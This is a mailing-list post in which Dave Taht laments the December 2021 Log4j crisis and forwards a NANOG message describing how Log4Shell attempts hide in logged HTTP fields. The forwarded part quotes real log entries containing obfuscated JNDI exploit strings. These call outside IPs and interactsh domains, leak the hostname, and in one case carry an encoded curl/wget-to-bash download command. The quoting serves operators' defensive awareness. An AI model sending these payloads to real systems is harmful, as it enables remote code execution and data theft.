[Bloat] Fwd: Log4j mitigation

Dave Taht dave.taht at gmail.com
Mon Dec 13 08:56:36 EST 2021


For those of you losing sleep over the Java logging exploit, my heart
goes out to you.

While I'm glad I, personally, and on the bufferbloat related websites,
haven't got a single thing written in Java, and I lost 3 weeks of my
life over Christmas to Spectre, and several weeks per year (and
usually right around Christmas!) coping with other CVEs... this one
seems so big and affecting so many other services I use, that I just
kind of want to take all my cash out of the bank, log out, and
find a tropical island somewhere.

---------- Forwarded message ---------
From: Jörg Kost <jk at ip-clear.de>
Date: Mon, Dec 13, 2021 at 3:43 AM
Subject: Re: Log4j mitigation
To: Jean St-Laurent <jean at ddostest.me>
Cc: <nanog at nanog.org>


You can't see it. The attack vector can hide in HTTP GETs, POSTs (SSL),
in headers, in anything related to where a Java process does logging
with Log4j; it's innumerable. It might even evaluate from a URI itself;
it won't use a fixed port. It's not wormy right now, but maybe it will
be soon.

We have been seeing things like this since the 10th of Dec. And this is only a
typical Apache logfile for HTTP/HTTPS, where we do logging:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281
"${jndi:dns://45.83.64.1/securityscan-http80}"
"${jndi:dns://45.83.64.1/securityscan-http80}
GET
/?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
HTTP/1.1" 200 -
"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}"
"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}



-- 
I tried to build a better future, a few times:
https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org

Dave Täht CEO, TekLibre, LLC

